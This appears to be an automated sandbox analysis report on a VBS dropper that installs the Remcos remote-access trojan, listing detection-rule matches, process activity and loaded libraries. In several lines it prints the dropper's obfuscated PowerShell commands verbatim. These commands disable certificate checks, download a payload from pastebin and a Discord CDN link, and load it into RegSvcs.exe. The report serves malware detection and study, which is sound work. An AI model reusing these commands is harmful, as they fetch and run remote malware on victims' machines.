                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: powershell.exe PID: 6740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@8/7@6/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040F474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041B4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].jsonJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-LD53L6
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlsxz3bk.ndr.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: envifa.vbsStatic file information: File size 2053166 > 1048576

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $MkplqW = 'J?Bs?H??cgBr?Gw?I??9?C??Jw?w?Cc?Ow?k?G0?a?B", "0", "false");
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $MkplqW = 'J?Bs?H??cgBr?Gw?I??9?C??Jw?w?Cc?Ow?k?G0?a?Bz?GY?bw?g?D0?I??n?CU?c?B6?EE?YwBP?Gc?SQBu?E0?cg?l?Cc?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBy?HY?ZQBy?EM?ZQBy?HQ?aQBm?Gk?YwBh?HQ?ZQBW?GE?b?Bp?GQ?YQB0?Gk?bwBu?EM?YQBs?Gw?YgBh?GM?aw?g?D0?I?B7?CQ?d?By?HU?ZQB9?Ds?WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?OwBb?EI?eQB0?GU?WwBd?F0?I??k?Ho?Z?Bt?Hc?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??o?E4?ZQB3?C0?TwBi?Go?ZQBj?HQ?I?BO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?Ck?LgBE?G8?dwBu?Gw?bwBh?GQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?Cc?a?B0?HQ?c??6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Vg?5?Hk?NQBR?DU?dgB2?Cc?KQ?g?Ck?I??p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?B6?GQ?bQB3?Gg?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DM?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DY?O??w?GQ?MQ?4?GU?N?Bm?DM?YgBm?DY?N??1?DY?Yw?x?DM?NgBh?Dk?M?Bk?DM?MQ?w?GQ